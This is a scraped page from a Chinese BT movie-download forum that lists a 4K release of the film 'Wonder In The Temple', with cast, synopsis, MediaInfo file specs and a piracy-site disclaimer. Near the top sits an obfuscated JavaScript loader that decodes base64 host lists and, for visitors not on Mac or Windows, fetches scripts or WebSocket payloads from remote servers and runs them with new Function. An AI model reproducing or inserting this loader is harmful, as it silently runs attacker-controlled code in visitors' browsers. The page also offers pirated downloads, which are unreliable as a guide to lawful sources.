一百零八[国语中字].Wonder.In.The.Temple.2019.WEB-DL.4K超清.迅雷下载

版主小s 1月前 354

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x49\x6e\x58\x62\x4c\x54\x4c\x79\x4d\x72']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('uawei')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9veXdoeWVlaGdoYS5ndWlydWktY2xvdGhlcy5jbb20saHR0cHM6Ly9vYnk2aTg3NjZqZjEuYnVqaWFuZ2ppdTEyMy5jbb20saHR0cHM6Ly9vNzdkMjM0a2RrZmhoLnNwYXJreWluY2h1bbi5jbb20saHR0cHM6Ly9vZmhnODg3MmozODRqZGpmLnRoLW1ha2UuY29tLGh0dHBzOi8vbbzM5ZmoyM2pqZDIzOGUueGlqaS1leHByZXNzLmNvbbQ==','d3NNzOi8vd3NN5ZC53c3RlbnNN5cy5jb206OTg2NNix3c3M6Ly93c2R4LndzdGVuc3JzLmNNvbTo5ODY2LHdzczovL3dzbXIud3NN0ZW5zZGYuY29tOjk4NNjY=',window,document,['b','N']);}:function(){};

一百零八[国语中字].Wonder.In.The.Temple.2019.WEB-DL.4K.H265.DDP.5.1-Dave 11.92GB

◎译 名 一百零八 / Wonder In The Temple

◎年 代 2019

◎产 地 中国大陆

◎类 别 剧情 / 爱情

◎语 言 汉语普通话

◎上映日期 2021-05-15(中国大陆) / 2019-10-16(丝绸之路国际电影节)

◎IMDb链接 https://www.imdb.com/title/tt10848020/

◎豆瓣评分 5.4/10 (4886人评价)

◎豆瓣链接 https://movie.douban.com/subject/30214261/

◎片 长 108分钟

◎导 演 孔嘉欢 Jiahuan Kong (id:1418267)

◎编 剧 孔嘉欢 Jiahuan Kong (id:1418267)

◎演 员 吕星辰 Xingchen Lü (id:1330093)

董凡 Fan Dong (id:1372710)

高亮 Liang Gao (id:1418268)

吴京 Jing Wu (id:1000525)

照宇 Zhao Yu (id:1421284)

沈朝杰 Chaojie Shen (id:1421285)

蒋林燕 Linyan Jiang (id:1346433)

王实 Shi Wang (id:1421286)

王婧 Jing Wang (id:1402783)

陶正东 Zhengdong Tao (id:1421287)

刘正东 Zhengdong Liu (id:1421288)

李哨兵 Shaobing Li (id:1421289)

周静 Jing Zhou (id:1421291)

魏铭 Ming Wei (id:1421290)

冯祎 Feng Yi (id:1456453)

廖小蝶 Xiaodie Liao (id:1421292)

苏德秀 Dexiu Su (id:1421293)

高凤 Feng Gao (id:1421294)

褚海辰 Haichen Chu (id:1368466)

万磊 Lei Wan (id:1418576)

张越 Yue Zhang (id:1418589)

◎标 签 汶川地震 / 108罗汉娃 / 灾难 / 温情 / 吴京 / 中国 / 爱 / 电影

◎简 介

电影讲述了驻唱歌手肖兰(吕星辰饰)离开成都前往什邡,在遭遇男友陆地(高亮饰)的闭门之痛后决定引产,沮丧之时突遇地震袭击。医护人员全力保护全院孕妇紧急转移至安全区域罗汉寺,自此寺院变产院,禅房变产房。这期间,肖兰亲历了灾难中人性极限的撕裂与挑战......

  1. General

  2. Unique ID : 236394062495476679367047449121665142009 (0xB1D7D722109B1B08FC05C493707D4CF9)

  3. Complete name : Wonder.In.The.Temple.2019.WEB-DL.4K.H265.DDP.5.1-Dave.mkv

  4. Format : Matroska

  5. Format version : Version 4

  6. File size : 11.9 GiB

  7. Duration : 1 h 44 min

  8. Overall bit rate : 16.4 Mb/s

  9. Encoded date : UTC 2021-06-21 08:26:27

  10. Writing application : mkvmerge v19.0.0 ('Brave Captain') 64-bit

  11. Writing library : libebml v1.3.5 + libmatroska v1.4.8


  12. Video

  13. ID : 1

  14. Format : HEVC

  15. Format/Info : High Efficiency Video Coding

  16. Format profile : [email protected]@Main

  17. Codec ID : V_MPEGH/ISO/HEVC

  18. Duration : 1 h 44 min

  19. Bit rate : 16.0 Mb/s

  20. Width : 3 840 pixels

  21. Height : 1 920 pixels

  22. Display aspect ratio : 2.000

  23. Frame rate mode : Constant

  24. Frame rate : 24.000 FPS

  25. Color space : YUV

  26. Chroma subsampling : 4:2:0

  27. Bit depth : 8 bits

  28. Bits/(Pixel*Frame) : 0.090

  29. Stream size : 11.6 GiB (97%)

  30. Default : Yes

  31. Forced : No


  32. Audio #1

  33. ID : 2

  34. Format : E-AC-3

  35. Format/Info : Enhanced AC-3

  36. Commercial name : Dolby Digital Plus

  37. Codec ID : A_EAC3

  38. Duration : 1 h 44 min

  39. Bit rate mode : Constant

  40. Bit rate : 256 kb/s

  41. Channel(s) : 6 channels

  42. Channel layout : L R C LFE Ls Rs

  43. Sampling rate : 48.0 kHz

  44. Frame rate : 31.250 FPS (1536 SPF)

  45. Compression mode : Lossy

  46. Stream size : 190 MiB (2%)

  47. Language : Chinese

  48. Service kind : Complete Main

  49. Default : Yes

  50. Forced : No


  51. Audio #2

  52. ID : 3

  53. Format : AAC LC

  54. Format/Info : Advanced Audio Codec Low Complexity

  55. Codec ID : A_AAC-2

  56. Duration : 1 h 44 min

  57. Bit rate : 192 kb/s

  58. Channel(s) : 2 channels

  59. Channel layout : L R

  60. Sampling rate : 44.1 kHz

  61. Frame rate : 43.066 FPS (1024 SPF)

  62. Compression mode : Lossy

  63. Stream size : 141 MiB (1%)

  64. Language : Chinese

  65. Default : No

  66. Forced : No



此处一般会放置磁力链或电驴下载链接,不过此链接需要注册会员才能看到,点击“立即注册”
磁力链下载【磁力链接仅对注册会员开放,登陆后可见】

TAGS 剧情 爱情

上传的附件:

BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。

最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回